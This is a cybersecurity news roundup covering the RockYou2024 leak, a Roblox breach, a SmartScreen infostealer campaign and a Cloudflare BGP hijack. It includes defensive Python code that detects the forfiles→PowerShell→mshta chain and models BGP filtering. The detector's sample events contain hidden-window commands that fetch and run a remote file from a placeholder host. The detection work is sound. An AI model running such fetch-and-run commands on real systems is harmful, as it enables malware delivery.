Security researchers are scrambling to assess the fallout from a massive leak of stolen passwords, dubbed "RockYou2024." Uploaded to a notorious cybercrime forum, the database allegedly contains nearly 10 billion unique passwords – a staggering figure that dwarfs previous records.

Unprecedented Scale of RockYou2024 Password Leak

According to Cybernews researchers, the RockYou2024 compilation appears to be the largest collection of leaked credentials ever discovered. The data, offered by a hacker using the alias "ObamaCare," reportedly consists of 9.948 billion unique passwords in plain text. It builds upon the RockYou2021 database, which exposed 8.4 billion passwords, with an additional 1.5 billion entries added between 2021 and 2024. Researchers estimate the trove originates from at least 4,000 separate data breaches spanning two decades.

Credential Stuffing Bonanza

Security experts warn that RockYou2024 presents a significant risk for credential stuffing attacks. These automated attacks replay stolen login credentials against multiple online services, and they succeed whenever users reuse the same password across different accounts. The researchers emphasize the danger: "revealing that many passwords for threat actors substantially heightens the risk of credential stuffing attacks." Attackers could potentially gain unauthorized access to a vast array of targets, including personal accounts, internet-connected devices, and even industrial control systems. Furthermore, when combined with other leaked data such as email addresses – readily available on hacker forums – RockYou2024 could fuel a wave of data breaches, financial fraud, and identity theft.

Mitigating the RockYou2024 Threat

Chris Bates, chief information security officer at SandboxAQ, said, “Companies should assume all passwords are compromised and build the correct mitigating controls. This includes phishing-resistant MFA, passwordless authentication, and behaviour-based detection and response programs to detect malicious use.” Beyond this advice, there are steps users can take to mitigate the risks associated with RockYou2024. Services like the "AmIBreached" data leak checker from Cyble allow individuals to verify whether their credentials have been compromised. More importantly, adopting strong, unique passwords for every online account is crucial. Password managers like LastPass, 1Password and Enpass can be invaluable tools for generating and storing complex passwords, ensuring each account has a unique login. Finally, identity theft protection services can provide an extra layer of security, assisting with recovery efforts in the event of fraud or identity theft.

The Road Ahead

The RockYou2024 leak serves as a stark reminder of the ever-evolving cyber threat landscape. Marc Manzano, general manager at SandboxAQ, said, “It's imperative for organizations to implement and enforce stringent password policies, educate users about the risks of password reuse, and put into action multi-factor authentication widespread adoption.” He added, “Enhancing overall IT systems security by deploying modern cryptography management platforms will be crucial in defending against large-scale threats leveraging stolen passwords.” Organizations and individuals alike must prioritize robust password security practices to stay ahead of malicious actors. As investigations into the leak continue, security professionals remain vigilant, anticipating the potential consequences of this colossal data breach.
American video game giant Roblox has reported a data breach stemming from a third-party service provider that helps host its annual Developer Conference. The result: data on in-person and online attendees who registered through the third party's platform in the last two years was leaked.

Roblox Corp. is an American video game developer based in San Mateo, California. Founded in 2004 by David Baszucki and Erik Cassel, the company is the developer of Roblox, which was released in 2006. As of December 2023, the company employs over 2,400 people. The gaming company has an average monthly user base of 214 million players and makes around $7 million per day from a user base that is primarily youngsters below the age of 16. In fact, 21% of its users are aged between 9 and 12.

Roblox Developers Conference Data Leak

Roblox on Friday notified all developers who registered on its FNTech platform about a recent data breach. FNTech is advertised on its website as a one-stop shop for everything related to in-person, virtual and hybrid events. Roblox said an "unauthorized" actor intruded into the third party's systems and from there accessed a subset of user information from a Roblox Developer Conference registration list. Roblox said the compromised details likely included Developer Conference attendees' full names, email addresses and IP addresses, the latter possibly collected from users attending the conference via the hybrid option.

[Image: Roblox data breach notification (Source: X)]

Roblox did not confirm whether any other data or its own systems were affected in a supply chain-type attack, but said it has "made efforts to ensure this type of incident is avoided in the future." What measures were implemented remains unclear. The Roblox Developer Conference 2024 will be hosted in San Jose, California on September 6-7.

Gamers often have valuable virtual assets and in-game purchases linked to their accounts. Hackers exploit vulnerabilities in servers and platforms to steal the data, which can be sold in the underground market. Recently, two prominent online gaming platforms in India, Teenpatti.com and Mobile Premier League (MPL.live), allegedly experienced data breaches. Similarly, Fortnite and Insomniac Games also experienced breaches by ransomware actors, which shows a steady interest by threat actors in a gaming sector that had largely been off the radar until now.
Cyble Research and Intelligence Labs (CRIL) researchers have uncovered an active campaign exploiting a Microsoft SmartScreen vulnerability to inject infostealers into users’ machines. Microsoft released a patch for the SmartScreen vulnerability (CVE-2024-21412) in February and CISA even added it to its Known Exploited Vulnerabilities catalog, but the patch has apparently seen limited deployment, as Cyble said the campaign is targeting users in multiple regions, including Spain, the U.S., and Australia. Another SmartScreen vulnerability (CVE-2024-29988) was patched in April.

Microsoft SmartScreen Vulnerability Exploited by Phishing

The campaign begins with phishing lures related to healthcare insurance schemes, transportation notices, and tax-related communications to trick users into downloading malicious payloads. The spam emails contain a link that redirects users to a WebDAV share using a search protocol to deceive them into executing a malicious internet shortcut file, the Cyble researchers said. The multi-stage attack that follows utilizes legitimate tools such as forfiles.exe, PowerShell, mshta, and other trusted files to circumvent security measures, and then DLL sideloading and IDATLoader inject the final payload into explorer.exe. The campaign delivers Lumma and Meduza Stealer as its final payloads.

Zero-Day Attack Discovered in January

The Zero Day Initiative (ZDI) uncovered a sophisticated DarkGate campaign in mid-January that was exploiting the vulnerability through fake software installers. The APT group Water Hydra has also been leveraging CVE-2024-21412 in a targeted campaign against financial market traders, bypassing SmartScreen to deploy the DarkMe remote access trojan (RAT). In the latest campaign, the Cyble researchers said threat actors (TAs) have been exploiting the vulnerability to bypass Microsoft Defender SmartScreen and deploy payloads on victims’ systems. The image below shows the infection chain observed by the Cyble researchers in the latest attacks.

[Image: Microsoft SmartScreen vulnerability attack chain (source: Cyble blog)]

Lure documents used in the campaign target Spanish taxpayers, transportation companies with emails purportedly from the U.S. Department of Transportation, and individuals in Australia by mimicking official Medicare enrollment forms.

Sophisticated Attack Chain

Upon execution, the malicious LNK file triggers the forfiles utility, a legitimate Windows executable designed for batch processing of files, the researchers said. If the utility successfully finds the “win.ini” file within the C:\Windows directory, forfiles.exe proceeds to execute a PowerShell command that leverages “mshta.exe” to execute a malicious file hosted on a remote server. The hosted file is named “dialer.exe” and has been altered to include embedded malicious JavaScript that uses the String.fromCharCode() method to decode and execute a PowerShell script. That script decrypts AES-encrypted blocks to load yet another PowerShell script, which downloads the lure document and a 7z installer file from the remote server and saves them to C:\Users\user\AppData\Roaming. Upon successful download, the PowerShell script opens the lure document and executes the installer file. The installer then drops additional files, including clean files, dependency DLLs, a malicious DLL for side-loading, and an encrypted IDAT loader, the Cyble researchers wrote. After placing all the files in the %appdata% directory, the installer begins DLL side-loading by launching a legitimate file. “This legitimate file then loads a malicious DLL, which retrieves the content of the IDAT loader, decrypts it, and injects the payload into explorer.exe,” the researchers said. “In this campaign, the injected content, recognized as Lumma and Meduza Stealer, subsequently carries out malicious operations on compromised systems.”

‘Increasingly Dynamic and Dangerous Threat Landscape’

The Cyble researchers said the recent surge in exploitation of CVE-2024-21412, along with the adoption of sophisticated techniques such as DLL sideloading and IDATLoader combinations, “highlights how cyber threats continue to evolve in an increasingly dynamic and dangerous threat landscape.” Malware-as-a-Service (MaaS) could amplify that trend by allowing malicious actors to deploy advanced tools more readily, they said. The researchers recommended a number of cybersecurity controls to help fight these sophisticated threats:

Advanced email filtering solutions can help detect and block malicious attachments and links, adding extra protection on top of cybersecurity training for end users.
The forfiles utility should be monitored and restricted, and the execution of scripting languages on user workstations and servers should be disabled or restricted if they are not essential for legitimate purposes.
Application whitelisting will help ensure that only approved and trusted applications and DLLs can execute on your systems.
Network segmentation can protect critical workloads and limit the spread of malware within an organization.

The Cyble blog also includes MITRE ATT&CK techniques, Indicators of Compromise (IoCs) and a YARA detection rule.
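The recommendation to monitor forfiles can be turned into concrete detection logic. The following is an added example written for this page, not code from Cyble's blog: it walks constructed Sysmon-style process-creation records and flags the forfiles -> PowerShell -> mshta chain and mshta pulling remote content, while leaving an ordinary forfiles batch job alone. The event field names, the process IDs and the placeholder URL are all constructed.

```python
import ntpath
import re

# Script hosts the article names (plus a few of the same kind); an admin batch
# job driven by forfiles normally does not spawn any of these.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOST_WORDS = tuple(h[:-4] for h in SCRIPT_HOSTS)      # "powershell", "mshta", ...
REMOTE_ARG = re.compile(r"https?://|\\\\", re.IGNORECASE)    # URL or UNC/WebDAV path


def basename(path: str) -> str:
    # ntpath handles Windows separators even when this runs on Linux
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Process chain from the root ancestor down to pid, as lowercase image names."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:       # 'seen' guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events):
    """Return (pid, rule) findings for the forfiles -> PowerShell -> mshta pattern."""
    findings = []
    for e in events:
        name = basename(e["image"])
        cmd = e["cmd"].lower()
        # Rule 1: forfiles' /c command hands off to a script host
        if name == "forfiles.exe" and any(w in cmd for w in SCRIPT_HOST_WORDS):
            findings.append((e["pid"], "forfiles launching script host"))
        # Rule 2: mshta given a URL or UNC/WebDAV path (remote-hosted HTA/script)
        if name == "mshta.exe" and REMOTE_ARG.search(e["cmd"]):
            findings.append((e["pid"], "mshta fetching remote content"))
        # Rule 3: any script host whose ancestors include forfiles
        if name in SCRIPT_HOSTS and "forfiles.exe" in ancestry(events, e["pid"])[:-1]:
            findings.append((e["pid"], "script host descended from forfiles"))
    return findings


# Constructed Sysmon Event ID 1-style records modelled on the chain described above.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles /p C:\Windows /m win.ini /c "powershell -w hidden -c mshta http://example.invalid/dialer.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c mshta http://example.invalid/dialer.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://example.invalid/dialer.exe"},
    # Benign administrative use of forfiles: no script host, no remote content.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles /p C:\Logs /m *.log /d -30 /c "cmd /c del @path"'},
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```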
Cloudflare’s privacy-first public DNS resolver service was hit by two simultaneous BGP issues recently, resulting in an unintentional BGP hijacking incident that highlights ongoing concerns over the security of the 35-year-old internet routing protocol. The outage and slowdowns that affected the free Cloudflare DNS resolver service “1.1.1.1” for a few hours on June 27 affected less than 1 percent of internet traffic, but the issue is likely to bring fresh attention to BGP, dubbed the “three-napkin protocol” for the way it was drafted on a lunch break at an IETF meeting in 1989. The FCC recently voted to require ISPs to report on their BGP security progress, a preliminary vote that will go through a public comment period before it can be finalized.

Historical Use of 1.1.1.1 Hits Cloudflare DNS Resolver Service

One problem affecting the six-year-old Cloudflare DNS resolver service is the historical use of 1.1.1.1 by networks in labs or as a testing IP address, “resulting in some residual unexpected traffic or blackholed routing behavior. Because of this, Cloudflare is no stranger to dealing with the effects of BGP misrouting traffic,” Cloudflare engineers wrote in a blog post reporting the incidents. The June 27 incident combined a routing hijack with a BGP route leak to effectively bring the service to a halt for users in affected regions.

A routing hijack of 1.1.1.1 could occur if a network assigned, say, 1.1.1.1/32 to one of its routers and shared the prefix with its internal network, which would make it difficult for its customers to route to the 1.1.1.1 DNS service. “If they advertise the 1.1.1.1/32 prefix outside their immediate network, the impact can be even greater,” the engineers wrote. The reason 1.1.1.1/32 would be selected instead of the 1.1.1.0/24 used by Cloudflare is Longest Prefix Matching (LPM), they said. Many prefixes in a route table could match the 1.1.1.1 address, but 1.1.1.1/32 is considered the “longest match” by the LPM algorithm because it has the highest number of identical bits and the longest subnet mask while still matching the 1.1.1.1 address. “In simple terms, we would call 1.1.1.1/32 the ‘most specific’ route available to 1.1.1.1,” Cloudflare said.

[Image: How BGP hijacks happen (source: Cloudflare)]

BGP route leaks occur “when a network becomes an upstream, in terms of BGP announcement, for a network it shouldn’t be an upstream provider for. ... If enough networks within the Default-Free Zone (DFZ) accept a route leak, it may be used widely for forwarding traffic along the bad path. Often this will cause the network leaking the prefixes to overload, as they aren’t prepared for the amount of global traffic they are now attracting.” These issues can happen to any IP address or prefix, but 1.1.1.1 “is such a recognizable and historically misappropriated address that it tends to be more prone to accidental hijacks or leaks than other IP resources,” Cloudflare said.

What Happened to the Cloudflare 1.1.1.1 Service

The Cloudflare 1.1.1.1 incident began when AS267613 (Eletronet S.A.) began announcing 1.1.1.1/32 to peers, providers, and customers. A minute later, AS262504 (Nova) leaked 1.1.1.0/24, also received from AS267613, upstream to AS1031 (PEER 1 Global Internet Exchange), which propagated 1.1.1.0/24 to various Internet Exchange peers and route servers, widening the impact of the leak. One Tier 1 provider received the 1.1.1.1/32 announcement from AS267613 as a Remote Triggered Blackhole (RTBH, a blunt method of fighting off DDoS attacks) route, causing blackholed traffic for all of the Tier 1’s customers. All of that happened in about a minute. Cloudflare engineers responded a little more than an hour later by disabling two partner peering points and engaging with Nova and Eletronet, but the issues weren’t fully resolved until about four hours after they began.

“The problem during this incident was AS267613 was unauthorized to blackhole 1.1.1.1/32,” the engineers wrote. “Cloudflare only should have the sole right to leverage RTBH for discarding of traffic destined for AS13335, which is something we would in reality never do.” Cloudflare said AS1031 “does not perform any extensive filtering for customer BGP sessions, and instead just matches on adjacency (in this case, AS262504) and redistributes everything that meets this criteria. Unfortunately, this is irresponsible of AS1031 and causes direct impact to 1.1.1.1 and potentially other services that fall victim to the unguarded route propagation. While the original leaking network was AS262504, impact was greatly amplified by AS1031 and others when they accepted the hijack or leak and further distributed the announcements.”

Cloudflare’s BGP Security Recommendations

Cloudflare offered several BGP security recommendations for network providers, particularly major networks with a large number of downstream Autonomous Systems.

RPKI Adoption

Resource Public Key Infrastructure adoption “recently reached a major milestone at 50% deployment in terms of prefixes signed by Route Origin Authorization (ROA),” the Cloudflare engineers wrote. “While RPKI certainly helps limit the spread of a hijacked BGP prefix throughout the Internet, we need all networks to do their part, especially major networks with a large sum of downstream Autonomous Systems (AS’s). During the hijack of 1.1.1.1/32, multiple networks accepted and used the route announced by AS267613 for traffic forwarding.”

RPKI and Remote-Triggered Blackholing (RTBH)

Cloudflare said a significant amount of the impact from the incident was due to a Tier 1 provider accepting 1.1.1.1/32 as a blackhole route from a third party that was not Cloudflare. “This in itself is a hijack of 1.1.1.1, and a very dangerous one,” the Cloudflare engineers said. “RTBH is a useful tool used by many networks when desperate for a mitigation against large DDoS attacks. The problem is the BGP filtering used for RTBH is loose in nature, relying often only on AS-SET objects found in Internet Routing Registries. ... AS-SET filtering is not representative of authority to blackhole a route, such as 1.1.1.1/32. Only Cloudflare should be able to blackhole a destination it has the rights to operate.” A potential fix for lenient filtering by providers on RTBH sessions would again be to leverage RPKI. An expired IETF draft proposal specified a Discard Origin Authorization (DOA) object that would authorize only specific origins to request a blackhole action for a prefix. “If such an object was signed, and RTBH requests validated against the object, the unauthorized blackhole attempt of 1.1.1.1/32 by AS267613 would have been invalid instead of accepted by the Tier 1 provider,” Cloudflare said.

BGP Best Practices

Simply following the BGP best practices laid out by Mutually Agreed Norms for Routing Security (MANRS) and rejecting IPv4 prefixes longer than a /24 in the Default-Free Zone (DFZ) would have reduced the impact to 1.1.1.1, Cloudflare said. “Rejecting invalid prefix lengths within the wider Internet should be part of a standard BGP policy for all networks.”

ASPA for BGP

Cloudflare has advocated for the adoption of RPKI into AS Path-based route leak prevention. Under Autonomous System Provider Authorization (ASPA) – still in its draft phase at the IETF – ASPA objects are similar to ROAs, except that instead of signing prefixes with an authorized origin AS, the AS itself is signed with a list of provider networks that are allowed to propagate its routes, they said. “So, in the case of Cloudflare, only valid upstream transit providers would be signed as authorized to advertise AS13335 prefixes such as 1.1.1.0/24 upstream.”

Cloudflare Expands BGP Route Leak Detection

Cloudflare has expanded the data sources for its route leak detection system to cover more networks and is “incorporating real-time data into the detection system to allow more timely response toward similar events in the future.” “Like all approaches to solving route leaks, cooperation amongst network operators on the Internet is required for success,” Cloudflare said. “While the actions of external networks are outside of Cloudflare’s direct control, we intend to take every step within both the Internet community and internally at Cloudflare to detect impact more quickly and lessen impact to our users.” Cloudflare also encouraged users to check isbgpsafeyet.com to see if their ISP is enforcing RPKI origin validation.
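To make the Longest Prefix Matching argument and the recommended controls concrete, here is an added example written for this page (not Cloudflare's code). It models a route table like the one in the June 27 incident in Python and shows how a /24 length limit, RPKI origin validation and origin-authorized blackholing (in the spirit of the DOA draft) change which origin wins LPM for 1.1.1.1. AS13335 and 1.1.1.0/24 come from the article; the ROA maxLength of 24 and the RTBH authorization set are assumptions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Announcement:
    prefix: str                # e.g. "1.1.1.1/32"
    origin_as: int             # AS that originated the route
    blackhole: bool = False    # carries the RTBH (discard) community


# Constructed ROA table: prefix -> (authorized origin AS, maxLength). maxLength is assumed.
ROAS = {"1.1.1.0/24": (13335, 24)}

# Assumed stand-in for a DOA-style object: only these origins may request a blackhole.
RTBH_AUTHORIZED = frozenset({13335})

MAX_IPV4_LEN = 24   # MANRS-style DFZ rule: reject IPv4 prefixes longer than /24


def roa_state(ann: Announcement) -> str:
    """RPKI origin validation against ROAS: 'valid', 'invalid' or 'not-found'."""
    net = ipaddress.ip_network(ann.prefix)
    covering = []
    for p, (origin, maxlen) in ROAS.items():
        roa_net = ipaddress.ip_network(p)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            covering.append((origin, maxlen))
    if not covering:
        return "not-found"
    if any(origin == ann.origin_as and net.prefixlen <= maxlen for origin, maxlen in covering):
        return "valid"
    return "invalid"   # covered by a ROA, but wrong origin or too specific


def accept(ann: Announcement) -> tuple[bool, str]:
    """Inbound policy a DFZ network could apply; returns (accepted, reason)."""
    net = ipaddress.ip_network(ann.prefix)
    if ann.blackhole:
        # A blackhole /32 is legitimate only from the prefix holder, not from AS-SET neighbours.
        if ann.origin_as not in RTBH_AUTHORIZED:
            return False, "blackhole from unauthorized origin"
        return True, "blackhole accepted"
    if net.version == 4 and net.prefixlen > MAX_IPV4_LEN:
        return False, "prefix longer than /24"
    state = roa_state(ann)
    if state == "invalid":
        return False, "ROA invalid"
    return True, state


def longest_prefix_match(rib, addr: str):
    """Pick the most specific route covering addr, as a router's FIB lookup does."""
    ip = ipaddress.ip_address(addr)
    best, best_len = None, -1
    for ann in rib:
        net = ipaddress.ip_network(ann.prefix)
        if net.version == ip.version and ip in net and net.prefixlen > best_len:
            best, best_len = ann, net.prefixlen
    return best


# Constructed RIB modelled on the incident: Cloudflare's /24 plus AS267613's /32,
# seen once as a plain route and once as an RTBH route.
SAMPLE_RIB = [
    Announcement("1.1.1.0/24", 13335),
    Announcement("1.1.1.1/32", 267613),
    Announcement("1.1.1.1/32", 267613, blackhole=True),
]


def best_route_origin(rib, addr: str, filtered: bool):
    """Origin AS that wins LPM for addr, with or without the inbound policy applied."""
    candidates = [a for a in rib if not filtered or accept(a)[0]]
    best = longest_prefix_match(candidates, addr)
    return None if best is None else best.origin_as


if __name__ == "__main__":
    for filtered in (False, True):
        print(f"filtered={filtered}: 1.1.1.1 -> AS{best_route_origin(SAMPLE_RIB, '1.1.1.1', filtered)}")
```

Without the policy, LPM sends 1.1.1.1 traffic to AS267613's /32; with it, the /32 is rejected on prefix length (and would also fail ROA validation) and the /24 from AS13335 wins.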
The vulnerability could be exploited to compromise systems without requiring user interaction, contrary to some severity assessments initially made by Tenable and Red Hat.
Eldorado also encrypts network shares using the SMB protocol, deletes shadow volume copies, and skips certain file types to prevent system damage. Affiliates can customize attacks on Windows, while Linux customization is limited.
Traeger grills face security bugs that could spell trouble for BBQ enthusiasts. High-severity vulnerabilities in the Traeger Grill D2 Wi-Fi Controller could allow remote attackers to control the grill's temperature or shut it down.
Online accounts are increasingly protected by passkey technology, but many platforms like banking, e-commerce, social media, and software development can still be compromised using adversary-in-the-middle (AitM) attacks.
Source: www.databreachtoday.com – Author: 1 – Fraud Management & Cybercrime, Ransomware – Ransomware Group Apparently Uses Leaked LockBit Builder Code to Mount Attacks – Jayant Chakravarti (@JayJay_Tech) • July 5, 2024 – New Zealand exercise equipment retailer Elite Fitness has a ransomware hacker problem. (Image: Elite Fitness) A ransomware group that uses locker malware based on […] The entry New Zealand Fitness Retailer Hit By DragonForce Ransomware – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 – 3rd Party Risk Management, Governance & Risk Management, Healthcare – HealthEquity Says a Vendor’s Compromised Credentials Led to Data Theft Breach – Marianne Kolbasuk McGee (HealthInfoSec) • July 5, 2024 – Image: Getty – Healthcare benefits plan administrator HealthEquity said hackers obtained sensitive data in a breach involving compromised credentials […] The entry Health Benefits Administrator Reports 3rd-Party Hack to SEC – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 – API Security, Fraud Management & Cybercrime, Ransomware – Steve King’s Legacy in Cybersecurity: Insights and Reflections – Anna Delaney (annamadeline) • July 5, 2024 – Clockwise, from top left: Anna Delaney, Tom Field, Richard Bird, Michael Novinson and Chris Riotta. In this special edition of the ISMG Editors’ Panel, […] The entry ISMG Editors: A Tribute to Steve King – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 – Artificial Intelligence & Machine Learning, Next-Generation Technologies & Secure Development – Hacker Had Unauthorized Access to Data on Designs for New AI Use Cases – Rashmi Ramesh (rashmiramesh_) • July 5, 2024 – OpenAI reportedly did not disclose a 2023 hack into its internal messaging systems. (Image: Shutterstock) A hacker […] The entry OpenAI Did Not Disclose 2023 Breach to Feds, Public: Report – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.